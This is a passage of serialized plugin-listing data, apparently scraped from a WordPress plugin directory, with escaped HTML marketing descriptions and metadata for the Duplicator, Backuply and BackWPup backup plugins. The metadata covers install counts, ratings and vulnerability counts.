href=\"https:\u002F\u002Fduplicator.com\u002Fwordpress-recovery-points-rollback\u002F?utm_source=wprepo&utm_medium=link&utm_content=wordpress_recovery_points&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">1-click rollbacks for WordPress sites\u003C\u002Fa>. Quickly and automatically recover from failed WordPress updates or disasters.\u003C\u002Fp>\n\u003Ch4>Partial WordPress Backup Plugin\u003C\u002Fh4>\n\u003Cp>Duplicator makes \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fpartial-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=partial_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">partial backups for WordPress\u003C\u002Fa> quick and easy. Save storage and restore sites faster with database-only, media-only, or completely custom backups.\u003C\u002Fp>\n\u003Ch4>Server to Server WordPress Migration Import Tool\u003C\u002Fh4>\n\u003Cp>Duplicator makes \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fserver-to-server-wordpress-migration\u002F?utm_source=wprepo&utm_medium=link&utm_content=server_to_server_migrations&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">server-to-server WordPress migrations\u003C\u002Fa> fast and hassle-free. Quickly import your website to a new server in minutes. No downtime, no data loss.\u003C\u002Fp>\n\u003Ch4>Smart WordPress Migration Wizard\u003C\u002Fh4>\n\u003Cp>Duplicator’s smart \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fwordpress-migration-wizard\u002F?utm_source=wprepo&utm_medium=link&utm_content=wordpress_migration_wizard&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">WordPress migration wizard\u003C\u002Fa> makes transferring your website to a new host or server effortless. No downtime, no data loss, and no code required.\u003C\u002Fp>\n\u003Ch4>Drag & Drop Import WordPress Website Tool\u003C\u002Fh4>\n\u003Cp>Migrating WordPress sites has never been easier with Duplicator’s \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fdrag-drop-import-wordpress-tool\u002F?utm_source=wprepo&utm_medium=link&utm_content=wordpress_migration_wizard&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">drag & drop import tools\u003C\u002Fa>. Quickly transfer your site to a new host or server in minutes, no code required.\u003C\u002Fp>\n\u003Ch4>Clone WordPress Website Plugin\u003C\u002Fh4>\n\u003Cp>Duplicator \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fclone-wordpress-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=clone_wordpress_website&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">clones your entire WordPress website\u003C\u002Fa> with 1-click, no code needed. Perfect for staging sites, sandbox, or site migration.\u003C\u002Fp>\n\u003Ch4>WordPress Staging Site\u003C\u002Fh4>\n\u003Cp>Duplicator Pro lets you \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fwordpress-staging-site\u002F?utm_source=wprepo&utm_medium=link&utm_content=wordpress_staging_site&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">create a WordPress staging site\u003C\u002Fa> directly from your WordPress dashboard. Safely test plugin updates, theme changes, and new features on a staging environment before pushing changes to your live site. No manual setup, no separate hosting, and no risk to your production site.\u003C\u002Fp>\n\u003Ch4>Duplicator Pro Features\u003C\u002Fh4>\n\u003Cp>Duplicator Pro takes Duplicator to the next level with features you’ll love, such as:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>WordPress staging sites – create a staging copy of your site to safely test changes before going live\u003C\u002Fli>\n\u003Cli>Drag and Drop installs – just drag the backup file to the destination site!\u003C\u002Fli>\n\u003Cli>Scheduled backups\u003C\u002Fli>\n\u003Cli>Cloud Storage to Dropbox Backups, Google Drive Backups, Microsoft OneDrive Backups, Amazon S3 Backups and FTP\u002FSFTP Backups\u003C\u002Fli>\n\u003Cli>Custom Backups and Cloning: want just plugins, or just themes, just the database? No problem!\u003C\u002Fli>\n\u003Cli>A special 2-step streamlined installer mode for mega-fast installs\u003C\u002Fli>\n\u003Cli>Recovery Points added for very fast emergency site restores\u003C\u002Fli>\n\u003Cli>Support for managed and shared hosts such as WordPress.com, WPEngine, GoDaddy Managed, and more\u003C\u002Fli>\n\u003Cli>Multi-threaded to support larger websites & databases\u003C\u002Fli>\n\u003Cli>Migrate an entire multisite WordPress network or a sub site as a standalone site\u003C\u002Fli>\n\u003Cli>Database and user creation \u003Cem>in the installer\u003C\u002Fem> with cPanel API\u003C\u002Fli>\n\u003Cli>Connect to cPanel directly from the installer\u003C\u002Fli>\n\u003Cli>Custom plugin hooks for developers\u003C\u002Fli>\n\u003Cli>Advanced permissions\u003C\u002Fli>\n\u003Cli>Email notifications\u003C\u002Fli>\n\u003Cli>Professional support\u003C\u002Fli>\n\u003Cli>… and much more!\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Supported Backup Cloud Storage Integrations\u003C\u002Fh4>\n\u003Cp>We support any Amazon S3 compatible storage providers plus these first-party integrations.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fsecure-wordpress-backups\u002F?utm_source=wprepo&utm_medium=link&utm_content=localhost_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Localhost Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fftp-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=ftp_sftp_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">FTP\u002F SFTP Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fdropbox-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=dropbox_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Dropbox Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fgoogle-drive-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=google_drive_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Google Drive Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fmicrosoft-one-drive-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=microsoft_one_drive_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Microsoft OneDrive Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Famazon-s3-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=amazon_s3_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Amazon S3 Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fcloudflare-r2-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=cloudflare_r2_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Cloudflare R2 Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fwasabi-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=wasabi_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Wasabi Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fdream-objects-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=dream_objects_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Dream Objects Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fvultr-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=vultr_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Vultr Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fwordpress-backups-for-digitalocean-spaces\u002F?utm_source=wprepo&utm_medium=link&utm_content=digital_ocean_spaces_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Digital Ocean Spaces Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fgoogle-cloud-storage-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=google_cloud_storage_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Google Cloud Storage Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Fbackblaze-b2-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=backblaze_b2_storage_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Backblaze B2 Storage Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fduplicator.com\u002Flinode-object-storage-wordpress-backup-plugin\u002F?utm_source=wprepo&utm_medium=link&utm_content=linode_object_storage_backups&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Linode Object Storage Backups\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>You can easily see why Duplicator is the best WordPress backup and migration plugin on the market! Want to unlock these features? \u003Ca href=\"https:\u002F\u002Fduplicator.com\u002F?utm_source=wprepo&utm_medium=link&utm_content=upgrade_to_pro&utm_campaign=duplicator_lite\" rel=\"nofollow ugc\">Upgrade to our Pro version\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Branding Guidelines\u003C\u002Fh4>\n\u003Cp>Duplicator&reg; is a registered trademark of Snap Creek LLC. When writing about the backup & migration plugin by Duplicator, please make sure to uppercase the initial first letter.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Duplicator (correct)\u003C\u002Fli>\n\u003Cli>duplicator (incorrect)\u003C\u002Fli>\n\u003C\u002Ful>\n","The best WordPress backup and migration plugin. Quickly and easily backup ,migrate, copy, move, or clone your site from one location to another.",1000000,52903115,98,4872,"2026-03-18T17:18:00.000Z","6.9.4",[20,195,22,196,197],"https:\u002F\u002Fduplicator.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fduplicator.1.5.16.zip",87,15,"2024-07-10 13:42:05",{"slug":223,"name":224,"version":225,"author":226,"author_profile":227,"description":228,"short_description":229,"active_installs":230,"downloaded":231,"rating":13,"num_ratings":232,"last_updated":233,"tested_up_to":215,"requires_at_least":234,"requires_php":235,"tags":236,"homepage":238,"download_link":239,"security_score":13,"vuln_count":240,"unpatched_count":28,"last_vuln_date":241,"fetched_at":30},"backuply","Backuply – Backup, Restore, Migrate and Clone","1.5.2","Softaculous","https:\u002F\u002Fprofiles.wordpress.org\u002Fsoftaculous\u002F","\u003Cp>Backuply is a WordPress backup plugin that helps you backup your WordPress website, saving you from loss of data because of server crashes, hacks, dodgy updates, or bad plugins.\u003C\u002Fp>\n\u003Cp>Backuply comes with Local Backups and Secure Cloud backups with easy integrations with FTP, FTPS, SFTP, WebDAV, Google Drive, Microsoft OneDrive, Dropbox, Amazon S3 and easy One-click restoration.\u003C\u002Fp>\n\u003Cp>Your website is your asset and it needs to constantly be protected from various security issues, server issues, hacking, etc. While you take all precautionary steps to protect your website, backups are the best form of security. With Backuply, you can be confident that your data is protected and is always available for restore during any disaster. Backuply creates full backups of your website and you can restore it to the same or a new WordPress website with the click of a button.\u003C\u002Fp>\n\u003Cp>Our backup and website cloning technology have been in use for more than a decade and we have now ported it to WordPress.\u003C\u002Fp>\n\u003Cp>You can find our official documentation at \u003Ca href=\"https:\u002F\u002Fbackuply.com\u002Fdocs\" rel=\"nofollow ugc\">https:\u002F\u002Fbackuply.com\u002Fdocs\u003C\u002Fa>. We are also active in our community support forums on wordpress.org if you are one of our free users. Our Premium Support Ticket System is at \u003Ca href=\"https:\u002F\u002Fsoftaculous.deskuss.com\u002Fopen.php?topicId=17\" rel=\"nofollow ugc\">https:\u002F\u002Fsoftaculous.deskuss.com\u002Fopen.php?topicId=17\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fbackuply.com\" title=\"Backuply Homepage\" rel=\"nofollow ugc\">Home Page\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fsoftaculous.deskuss.com\u002Fopen.php?topicId=17\" title=\"Backuply Support\" rel=\"nofollow ugc\">Support\u003C\u002Fa> | \u003Ca href=\"http:\u002F\u002Fbackuply.com\u002Fdocs\" title=\"Documents\" rel=\"nofollow ugc\">Documents\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Local Backups:\u003C\u002Fstrong> Backup your complete website locally on your server with just one click.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>FTP:\u003C\u002Fstrong> Easily backup and restore your backup using FTP.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Backup to Google Drive\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>One-Click Restore:\u003C\u002Fstrong> Restore your website files and databases with a one-click restore.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Migration:\u003C\u002Fstrong> Stress-free migration to any domain or host.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Database Backups:\u003C\u002Fstrong> Backup your website’s database only.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Premium Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Automatic Backups:\u003C\u002Fstrong> Choose to back up your website at regular intervals like Daily, Weekly, or Monthly. You can also customize the interval.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>One-click Restore:\u003C\u002Fstrong> With Backuply, restoring your website is simple. Just click on the restore button next to the backup you want to restore from. Your entire backup will be downloaded and the changes will be applied to the website.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Selective Backup:\u003C\u002Fstrong> You have the option to choose from whether only files or database backups or full backups should be performed.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Website Migration:\u003C\u002Fstrong> You can easily migrate your website by restoring from one of the Cloud Backup options on the new website.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Website Cloning:\u003C\u002Fstrong> If you would like to clone your website for any purpose, Backuply can do that for you. Backuply will restore the data but replace the URLs and information as per the existing website. In this way, you can create multiple clones.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Backup to FTPS:\u003C\u002Fstrong> You can back up your site to an FTPS i.e. FTP over SSL \u002F TLS.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Backup to SFTP:\u003C\u002Fstrong> Supports the SFTP protocol.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Backup to Dropbox\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Backup to Microsoft One Drive\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Backup to Amazon S3\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Backup to WebDAV\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Backup to S3 Compatible Storages:\u003C\u002Fstrong> Added support for DigitalOcean Spaces, Linode Object Storage, Vultr Object Storage, and Cloudflare R2.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Support for WP-CLI:\u003C\u002Fstrong> You can use Backuply through WP-CLI\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Professional Support:\u003C\u002Fstrong> Get professional support and more features to make backup your website with \u003Ca href=\"https:\u002F\u002Fbackuply.com\u002Fpricing\" rel=\"nofollow ugc\">Backuply\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Backups\u003C\u002Fh3>\n\u003Cp>Backup is a way of copying your data or files to a secure place, which can be used to restore your website in case of data loss. Backups are vital in securing the data that you have published or written. Backups with Backuply are easy and secure with support for multiple options of storage like local storage using FTP or using third-party services like Google Drive, Dropbox, Microsoft OneDrive, AWS S3 and WebDAV.\u003Cbr \u002F>\nTo make it even easier we support Automatic Backups with a customizable backup schedule.\u003C\u002Fp>\n\u003Ch3>Restores\u003C\u002Fh3>\n\u003Cp>Restoring is just a One-Click process using Backuply. If the selected backup is available then Backuply will restore your backups safely. Restoring a backup will roll back your site in the exact same state as it was when the backup was created.\u003C\u002Fp>\n\u003Ch3>Migration\u003C\u002Fh3>\n\u003Cp>Backuply creates a tar file of your whole WordPress install with the Database, so you can migrate your site to any host or location where WordPress can be installed. All you need to do is create a Backup of your WordPress install on a remote location, and that’s it, It can be synced on any WordPress install with ease so you just need to restore the synced backup on the new location for Migration to happen.\u003C\u002Fp>\n\u003Ch3>How to install Backuply\u003C\u002Fh3>\n\u003Cp>Go To your WordPress install -> Plugins -> Add New Button -> In Search Box search For Backuply -> Click on Install.\u003C\u002Fp>\n","Backup, restores, and migration with Backuply are fairly simple with a wide range of storage options from Local Backups, FTP to cloud options like AWS &hellip;",700000,6209463,129,"2026-02-26T11:06:00.000Z","4.7","5.5",[20,195,22,237,197],"restore","http:\u002F\u002Fwordpress.org\u002Fplugins\u002Fbackuply\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbackuply.1.5.2.zip",5,"2025-09-25 00:00:00",{"slug":243,"name":244,"version":245,"author":246,"author_profile":247,"description":248,"short_description":249,"active_installs":250,"downloaded":251,"rating":252,"num_ratings":253,"last_updated":254,"tested_up_to":192,"requires_at_least":255,"requires_php":171,"tags":256,"homepage":257,"download_link":258,"security_score":259,"vuln_count":260,"unpatched_count":28,"last_vuln_date":261,"fetched_at":30},"backwpup","BackWPup – WordPress Backup & Restore Plugin","5.6.8","WP Media","https:\u002F\u002Fprofiles.wordpress.org\u002Fwp_media\u002F","\u003Cp>\u003Ca href=\"https:\u002F\u002Fbackwpup.com\u002F\" rel=\"nofollow ugc\">BackWPup\u003C\u002Fa> is the most comprehensive backup & restore plugin for WordPress.\u003C\u002Fp>\n\u003Ch4>🎉 BackWPup 5.5– New Features & Improvements\u003C\u002Fh4>\n\u003Cp>BackWPup 5.5 is now available! Building on previous releases, it brings back your most‑requested features and delivers a refreshed, more controlled backup experience—shaped by your feedback.\u003C\u002Fp>\n\u003Cp>🚀 What’s new in BackWPup?\u003C\u002Fp>\n\u003Cp>✅ Archive format per backup: Pick the archive type for each backup (ZIP, TAR, etc.) to match your storage and restore needs.\u003C\u002Fp>\n\u003Cp>✅ Archive name per backup: Give each backup a clear, custom filename so they are easy to recognize at a glance.\u003C\u002Fp>\n\u003Cp>If you happen to experience any issues with the new version, contact us directly \u003Ca href=\"https:\u002F\u002Fbackwpup.com\u002Fcontact\" rel=\"nofollow ugc\">here\u003C\u002Fa> so we can investigate your case. We are committed to resolving any concerns quickly and are actively working to ensure a smooth experience for everyone.\u003C\u002Fp>\n\u003Cp>How It Works: The 3-Step Backup Wizard\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Cstrong>What\u003C\u002Fstrong> – Choose your backup contents through our intuitive setup wizard\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>When\u003C\u002Fstrong> – Set your backup schedule (hourly, daily, weekly, or monthly)\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Where\u003C\u002Fstrong> – Select your preferred storage destination(s)\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Create comprehensive backups and restore your data with ease!\u003C\u002Fp>\n\u003Ch4>🌟 The Best WordPress Backup & Restore Plugin\u003C\u002Fh4>\n\u003Cp>Easily create a complete WordPress backup, store it on external services (such as \u003Cstrong>Dropbox\u003C\u002Fstrong>, \u003Cstrong>S3\u003C\u002Fstrong>, \u003Cstrong>FTP\u003C\u002Fstrong>, \u003Cstrong>Google Drive\u003C\u002Fstrong>, \u003Cstrong>OneDrive\u003C\u002Fstrong> and more) and restore your backup directly from your WordPress admin, in just a few clicks.\u003C\u002Fp>\n\u003Cp>BackWPup is designed for ease of use. Even beginners can create a reliable backup of their WordPress sites with just a few clicks.  With BackWPup, you can enjoy peace of mind knowing your data is safe and secure. Whether you are a small business owner or managing a large enterprise, BackWPup is the ultimate solution for protecting your WordPress site.\u003C\u002Fp>\n\u003Ch4>💎 BackWPup Pro Features\u003C\u002Fh4>\n\u003Cp>Take your WordPress backups to the next level with BackWPup Pro. Get additional features like:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Additional Cloud Storage options (Amazon Glacier, Google Drive, OneDrive, HiDrive).\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Encrypted backups for enhanced security\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Custom API keys for Dropbox and SugarSync\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Standalone restore application for recovery without WordPress access\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Seamless site migration by restoring to a new URL with BackWPup.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Premium support with dedicated ticket system\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>And much more!\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>\u003Ca href=\"https:\u002F\u002Fbackwpup.com\u002F#buy\" rel=\"nofollow ugc\">Get BackWPup Pro\u003C\u002Fa>\u003C\u002Fstrong> for the complete backup and restore solution.\u003C\u002Fp>\n\u003Ch4>⏰ Schedule and Manage Backups Easily\u003C\u002Fh4>\n\u003Cp>With BackWPup, you have full control over your backup process. You can back up your entire WordPress site, including files and database, save them to multiple locations, and easily restore your site from a backup if anything goes wrong. You can choose what to back up, how often to perform backups, and where to store them:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Comprehensive Backups: Backup your entire WordPress installation, including the \u002Fwp-content\u002F folder, database and any additional non-WordPress files and folders.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Flexible Scheduling: Schedule automatic backups to run hourly, daily, weekly, monthly —with the freedom to pick any specific date in the month\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Immediate Backups: Instantly run any scheduled backup job with the “Backup Now” button—perfect for on-demand backups before updates or changes.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Custom Backup Jobs: Combine files and database into a single job, or set up separate jobs for advanced workflows.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Store your backup in different locations:\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>\u003Cstrong>Free version\u003C\u002Fstrong>: Dropbox, Amazon S3, FTP, Rackspace Cloud, Microsoft Azure, SugarSync.\u003Cbr \u002F>\n  \u003Cstrong>Pro version\u003C\u002Fstrong>: Additional storage options including Amazon Glacier, Google Drive, OneDrive and HiDrive \u003Cstrong>\u003Ca href=\"https:\u002F\u002Fbackwpup.com\u002F#buy\" rel=\"nofollow ugc\">Get BackWPup Pro\u003C\u002Fa>\u003C\u002Fstrong>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>This flexibility makes BackWPup the best choice for WordPress backup.\u003C\u002Fp>\n\u003Ch4>🛟 Easily Restore Your WordPress Site\u003C\u002Fh4>\n\u003Cp>Restore your site effortlessly from a backup with our \u003Cstrong>one-click restore option\u003C\u002Fstrong>. To restore a backup, go to the BackWPup plugin settings in your WordPress admin area. Select the backup you wish to restore, click on the three dots menu and click ‘Restore Full Backup’. And the restore is done. This feature ensures that even in the event of data loss or site issues, you can quickly and efficiently restore your site to its previous state.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Access-Free Recovery\u003C\u002Fstrong>\u003Cbr \u002F>\nLocked out of your dashboard? No problem. The standalone restore app on the Pro version lets you restore your site from any backup, even when you can’t access WordPress. Perfect for emergencies. \u003Cstrong>\u003Ca href=\"https:\u002F\u002Fbackwpup.com\u002F#buy\" rel=\"nofollow ugc\">Get BackWPup Pro\u003C\u002Fa>\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch4>⚡ Improve Your Site’s Reliability and Performance\u003C\u002Fh4>\n\u003Cp>Did you know that regular backups and database maintenance can improve the performance and reliability of your WordPress site? With BackWPup, you can ensure that your data is always protected and that your site is always running smoothly.\u003C\u002Fp>\n\u003Cp>By scheduling regular backups and database maintenance, you can avoid data loss and downtime. BackWPup makes it easy to protect your data and keep your site running at its best.\u003C\u002Fp>\n\u003Cp>Even Google recommends regular backups and database maintenance to ensure the reliability and performance of your site. With BackWPup, you can follow best practices and keep your site secure and reliable.\u003C\u002Fp>\n\u003Ch4>😎 Easy Migration\u003C\u002Fh4>\n\u003Cp>BackWPup makes migrating your WordPress site simple. Whether you’re switching hosts or moving to a new server, easily export your files and database, then restore everything with just a few clicks—quick and hassle-free. Available only on the Pro version – \u003Cstrong>\u003Ca href=\"https:\u002F\u002Fbackwpup.com\u002F#buy\" rel=\"nofollow ugc\">Get BackWPup Pro\u003C\u002Fa>\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch4>❓ Is BackWPup Free?\u003C\u002Fh4>\n\u003Cp>You can use BackWPup for free with all its basic features. The free version includes complete backup, scheduling, support for external storage services (like Dropbox, S3, FTP, and more) and restore.\u003C\u002Fp>\n\u003Cp>The pro version offers many additional features including more settings, destinations, and of course access to our premium support. Check out our premium plans: \u003Ca href=\"https:\u002F\u002Fbackwpup.com\u002F#buy\" rel=\"nofollow ugc\">https:\u002F\u002Fbackwpup.com\u002F#buy\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>ℹ️ Who Are We?\u003C\u002Fh4>\n\u003Cp>We are \u003Ca href=\"https:\u002F\u002Fwp-media.me\u002F\" rel=\"nofollow ugc\">WP Media\u003C\u002Fa>, the company behind WP Rocket, the best performance plugin for WordPress.\u003C\u002Fp>\n\u003Cp>Our mission is to improve the web. We are making it faster with \u003Ca href=\"https:\u002F\u002Fwp-rocket.me\u002F\" rel=\"nofollow ugc\">WP Rocket\u003C\u002Fa>, lighter with \u003Ca href=\"https:\u002F\u002Fimagify.io\" rel=\"nofollow ugc\">Imagify\u003C\u002Fa> and safer with \u003Ca href=\"https:\u002F\u002Fbackwpup.com\u002F\" rel=\"nofollow ugc\">BackWPup\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>👋 Get in Touch!\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Website: \u003Ca href=\"https:\u002F\u002Fbackwpup.com\u002F\" rel=\"nofollow ugc\">backwpup.com\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Contact Us: \u003Ca href=\"https:\u002F\u002Fbackwpup.com\u002Fcontact\u002F\" rel=\"nofollow ugc\">https:\u002F\u002Fbackwpup.com\u002Fcontact\u002F\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>🔌 Related Plugins\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwp-rocket.me\u002F?utm_source=wordpress.org&utm_medium=referral&utm_campaign=backwpupplugin\" rel=\"nofollow ugc\">WP Rocket: The best performance plugin\u003C\u002Fa> to speed up your WordPress website.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fimagify.io\u002F?utm_source=wordpress.org&utm_medium=referral&utm_campaign=backwpupplugin\" rel=\"nofollow ugc\">Imagify: The best image optimization plugin\u003C\u002Fa> to speed up your website with lighter images.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Frocket-lazy-load\u002F\" rel=\"ugc\">Lazy Load\u003C\u002Fa>: The best Lazy Load script to reduce the number of HTTP requests and improve the website’s loading time.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fheartbeat-control\u002F\" rel=\"ugc\">Heartbeat Control by WP Rocket\u003C\u002Fa>: Heartbeat Control by WP Rocket: The best plugin to control the WordPress Heartbeat API and reduce CPU usage.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Frocketcdn.me\u002Fwordpress\u002F?utm_source=wordpress.org&utm_medium=referral&utm_campaign=backwpupplugin\" rel=\"nofollow ugc\">RocketCDN: The best CDN plugin for WordPress\u003C\u002Fa> to propel your content at the speed of light – no matter where your users are located in the world.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fupload-max-file-size\u002F\" rel=\"ugc\">Increase Max upload file size\u003C\u002Fa>: The best plugin to increase the upload file size limit to any value with one click.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>License: GPLv2 or later\u003C\u002Fp>\n\u003Cp>License URI: http:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-2.0.html\u003C\u002Fp>\n","Create a complete WordPress backup easily. Schedule automatic backups, store securely, and restore effortlessly with the best WordPress backup 